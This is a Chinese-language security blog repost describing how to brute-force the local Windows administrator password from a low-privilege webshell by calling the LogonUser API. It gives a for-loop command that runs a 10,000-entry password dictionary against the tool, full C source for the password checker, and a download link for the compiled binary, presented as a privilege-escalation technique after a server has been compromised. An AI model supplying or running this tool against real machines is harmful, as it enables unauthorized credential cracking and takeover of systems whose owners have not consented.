FavoriteLoading
0

webshell下的另類提權之3389密碼爆破

在土司看到的由x0wolf發布的一個提權新思路覺得不錯就收藏過來了。 利用 LogonUser API 模擬用戶登陸  判斷賬號密碼登陸成功與否(就是本地爆破) 該種方法不通過網絡 速度極快 低權限 (webshell下) 就可以運行 for /f %i in (10k_passwd.txt) do test.exe administrator %i 1w 字典幾乎是幾秒,缺點就是會產生大量系統登陸日志。 腳本:

#include #include   void help()
 {        
            printf("by x0wolf && lostwolf n");         
            printf("runas user passn");
 }   
int LoginCreateProcess(char* user,char* pass)
 {        
            HANDLE hToken; 
            STARTUPINFOA   si; 
            PROCESS_INFORMATION pi;

             ZeroMemory(&si, sizeof(si));
             ZeroMemory(&pi, sizeof(pi)); 
             si.cb = sizeof(si); 

             if(0 == LogonUser(user, ".", pass, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken))
 {                 
             printf("Failed to call LogonUser FailedNum:%dn",GetLastError());
             return 0;  
  }         
             else
  {                 
             printf("Login Sucessedn"); 
             return 1;
  }
  }   
             int main(int argc,char* argv[])
 {         
             if(argc!=3)
 {                 
             help();                 
             exit(0);         
  }         
             if(argc==3)        
  {                 
             LoginCreateProcess(argv[1],argv[2]);        
  } 
  }

工具下載:https://pan.baidu.com/s/1sl54gUh

【聲明】:8090安全小組門戶(http://www.jvwkvg.tw)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。